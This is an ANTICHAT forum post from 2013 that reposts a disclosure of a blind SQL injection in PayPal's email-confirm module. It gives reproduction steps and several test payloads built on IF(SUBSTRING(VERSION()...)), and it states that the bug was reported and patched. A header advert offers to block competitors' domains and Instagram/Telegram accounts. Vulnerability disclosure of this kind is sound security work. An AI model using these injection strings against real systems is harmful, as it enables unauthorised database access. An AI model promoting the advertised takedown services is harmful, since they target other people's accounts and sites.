Paypal.com Blind SQL Injection

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > ОФФТОП > Forum for discussion of ANTICHAT
Paypal.com Blind SQL Injection

Опции темы

Поиск в этой теме

Опции просмотра

23.01.2013, 01:00

Kontik

Участник форума

Регистрация: 25.11.2010

Сообщений: 190

С нами: 8138486

Репутация: -10

Paypal.com Blind SQL Injection

The blind sql injection vulnerability can be exploited by remote attackers with low privileged application user account and
without required user interaction. For demonstration or reproduce ...

URL1: Request a Session with 2 different mails (Step1)
https://www.paypal.com/de/ece/cn=060...iliuty-lab.com
https://www.paypal.com/de/ece/cn=060...x445@gmail.com

URL2: Injection into ID Confirm Field (Step2)
https://www.paypal.com/de/cgi-bin/we...ssword-submit&
dispatch=5885d80a13c0db1f8e263663d3faee8d7283e7f01 84a5674430f290db9e9c846

1. Open the website of paypal and login as standard user with a restricted account
2. Switch to the webscr > Confirm Email module of the application
3. Request a login confirm id when processing to load a reset
4. Take the valid confirm number of the mail and insert it into the email confirm number verification module input fields
5. Switch to the last char of the valid confirm number in the input field and inject own sql commands as check to proof the validation

Test Strings:
-1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1-1'
-1'+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1--1'
1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1
1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=-1'

6. Normally the website with the generated ID confirm button is bound to the standard template.
7. Inject substrings with the id -1+sql-query to proof for blind injections in the input field
8. The bottom bar gets loaded as result for the successful executed sql query
8. Now, the remote attacker can manipulate the paypal core database with a valid confirm number + his own sql commands

Bug Type: Blind SQL INJECTION
SESSION: DE - 22:50 -23:15 (paypal.com)
Browser: Mozilla Firefox 18.01

PoC:

Please enter it here

Note: Do all requests ever with id to reproduce the issue. (-) is not possible as first char of the input request.

Example(Wrong): -1+[SQL-Injection]&06021484023183514599
Example(Right): 06021484023183514599-1+[SQL-Injection]--
Example(Right): 06021484023183514599-1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1-1'-1'--

Note:
After inject was successful 2 times because of my check, the paypal website opened a security issue report message box as exception-handling.
I included the details and information of my test and explained the issue and short time later it has been patched.

𝕏 Twitter Reddit Telegram Копировать ссылку

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход